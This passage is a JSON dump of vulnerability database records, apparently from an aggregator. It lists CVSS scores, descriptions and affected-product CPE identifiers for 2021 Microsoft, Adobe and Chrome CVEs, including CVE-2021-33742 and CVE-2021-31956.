"3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft MSHTML Platform Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33742"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-33742", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2023-02-09T14:20:07", "description": "Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-31199.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-08T23:15:00", "type": "cve", "title": "CVE-2021-31201", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", 
"accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31199", "CVE-2021-31201"], "modified": "2022-07-12T17:42:00", "cpe": ["cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2008:r2"], "id": "CVE-2021-31201", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-31201", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:20:06", "description": "Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-31201.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-08T23:15:00", "type": "cve", "title": "CVE-2021-31199", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31199", "CVE-2021-31201"], "modified": "2022-07-12T17:42:00", "cpe": ["cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2008:r2"], "id": "CVE-2021-31199", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-31199", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:21:10", "description": "Microsoft Defender Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-08T23:15:00", "type": "cve", "title": "CVE-2021-31985", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31985"], "modified": "2022-05-27T14:04:00", "cpe": [], "id": "CVE-2021-31985", "href": 
"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-31985", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-02-09T14:21:06", "description": "Windows Remote Desktop Services\u00c2 Denial of Service Vulnerability", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-06-08T23:15:00", "type": "cve", "title": "CVE-2021-31968", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31968"], "modified": "2021-06-11T16:52:00", "cpe": ["cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2008:sp2", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_rt_8.1:-", 
"cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2008:r2"], "id": "CVE-2021-31968", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-31968", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:sp2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:23:07", "description": "Microsoft DWM Core Library Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-08T23:15:00", "type": "cve", "title": "CVE-2021-33739", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, 
"obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33739"], "modified": "2022-05-03T16:04:00", "cpe": ["cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2016:20h2"], "id": "CVE-2021-33739", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33739", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:16:36", "description": "Acrobat Reader DC versions versions 2021.001.20150 (and earlier), 2020.001.30020 (and earlier) and 2017.011.30194 (and earlier) are affected by a Use After Free vulnerability. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. 
Exploitation of this issue requires user interaction in that a victim must open a malicious file.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-02T17:15:00", "type": "cve", "title": "CVE-2021-28550", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28550"], "modified": "2021-09-15T13:55:00", "cpe": ["cpe:/a:adobe:acrobat:17.011.30194", "cpe:/a:adobe:acrobat_reader_dc:21.001.20150", "cpe:/a:adobe:acrobat:20.001.30020", "cpe:/a:adobe:acrobat_dc:21.001.20150", "cpe:/a:adobe:acrobat_reader:20.001.30020", "cpe:/a:adobe:acrobat_reader:17.011.30194"], "id": "CVE-2021-28550", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-28550", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:adobe:acrobat_reader:17.011.30194:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat:17.011.30194:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:20.001.30020:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_dc:21.001.20150:*:*:*:continuous:*:*:*", "cpe:2.3:a:adobe:acrobat_reader_dc:21.001.20150:*:*:*:continuous:*:*:*", 
"cpe:2.3:a:adobe:acrobat:20.001.30020:*:*:*:classic:*:*:*"]}, {"lastseen": "2023-02-09T14:21:05", "description": "Windows Kernel Information Disclosure Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-06-08T23:15:00", "type": "cve", "title": "CVE-2021-31955", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31955"], "modified": "2021-06-10T18:04:00", "cpe": ["cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2019:-"], "id": "CVE-2021-31955", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-31955", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", 
"cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:06:15", "description": "Type confusion in V8 in Google Chrome prior to 90.0.4430.85 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-04-26T17:15:00", "type": "cve", "title": "CVE-2021-21224", "cwe": ["CWE-843"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21224"], "modified": "2021-06-01T15:22:00", "cpe": ["cpe:/o:fedoraproject:fedora:32", "cpe:/o:fedoraproject:fedora:33", "cpe:/o:debian:debian_linux:10.0", "cpe:/o:fedoraproject:fedora:34"], "id": "CVE-2021-21224", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21224", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*", 
"cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:21:06", "description": "Windows NTFS Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-08T23:15:00", "type": "cve", "title": "CVE-2021-31956", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31956"], "modified": "2022-05-03T16:04:00", "cpe": ["cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2008:sp2", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2016:-", 
"cpe:/o:microsoft:windows_server_2008:r2"], "id": "CVE-2021-31956", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-31956", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:sp2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:23:07", "description": "Windows MSHTML Platform Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-08T23:15:00", "type": "cve", "title": "CVE-2021-33742", "cwe": ["CWE-681"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, 
"userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33742"], "modified": "2022-07-12T17:42:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2008:sp2", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2016:-"], "id": "CVE-2021-33742", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33742", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:sp2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", 
"cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:14:08", "description": "Microsoft SharePoint Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31963, CVE-2021-31966.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-08T23:15:00", "type": "cve", "title": "CVE-2021-26420", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26420", "CVE-2021-31963", "CVE-2021-31966"], "modified": "2021-09-13T18:54:00", "cpe": ["cpe:/a:microsoft:sharepoint_server:2019", "cpe:/a:microsoft:sharepoint_enterprise_server:2016", "cpe:/a:microsoft:sharepoint_foundation:2013"], "id": 
